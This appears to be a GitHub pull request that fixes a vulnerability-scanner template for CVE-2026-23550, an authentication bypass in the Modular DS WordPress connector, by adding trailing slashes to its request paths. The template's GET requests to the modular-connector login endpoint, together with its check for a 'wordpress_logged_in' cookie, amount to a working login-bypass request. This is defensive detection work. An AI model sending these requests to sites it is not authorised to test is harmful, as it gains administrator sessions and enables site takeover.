### PR TITLE
fix(CVE-2026-23550): avoid FN on WordPress trailing-slash redirects

### DIFF
--- a/http/cves/2026/CVE-2026-23550.yaml
+++ b/http/cves/2026/CVE-2026-23550.yaml
@@ -2,7 +2,7 @@ id: CVE-2026-23550
 
 info:
   name: Modular DS - Broken Access Control
-  author: DhiyaneshDk
+  author: DhiyaneshDk,l46983284-cpu
   severity: high
   description: |
     Modular DS = 2.5.1 contains a broken access control vulnerability caused by incorrect privilege assignment, letting attackers escalate their privileges, exploit requires no special conditions.
@@ -25,8 +25,8 @@ variables:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}?origin=mo&type=foo"
-      - "{{BaseURL}}/api/modular-connector/login/{{string}}?origin=mo&type=foo"
+      - "{{BaseURL}}/index.php/api/modular-connector/login/{{string}}/?origin=mo&type=foo"
+      - "{{BaseURL}}/api/modular-connector/login/{{string}}/?origin=mo&type=foo"
 
     matchers:
       - type: dsl
@@ -34,4 +34,3 @@ http:
           - status_code == 302
           - contains(header, "wordpress_logged_in")
         condition: and
-# digest: 4a0a00473045022100c46495eb5fe71644479d0feb21339e99a6f869f87692322e2e7e35f9068a08be022069850f178d71c1299402fe646c184201d6c22ecce1ba557dd434fcdf5c012e49:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## Summary
- Update `CVE-2026-23550` request paths to use the canonical trailing-slash form of the modular-connector login endpoint.
- Prevents false negatives on WordPress installs that 301-redirect non-slash URLs before the auth-bypass matcher can fire.

## Context
Fixes #16554. Reported reproduction shows:
- `GET /api/modular-connector/login/<id>?...` → `301` with `Location: .../login/<id>/?...`
- Canonical slash path returns the intended `302` + `wordpress_logged_in` cookie.

## Test plan
- [ ] Review path change against issue #16554 dumps
- [ ] CI template validation
- [ ] Optional live retest on modular-connector <= 2.5.1 with trailing-slash canonical redirects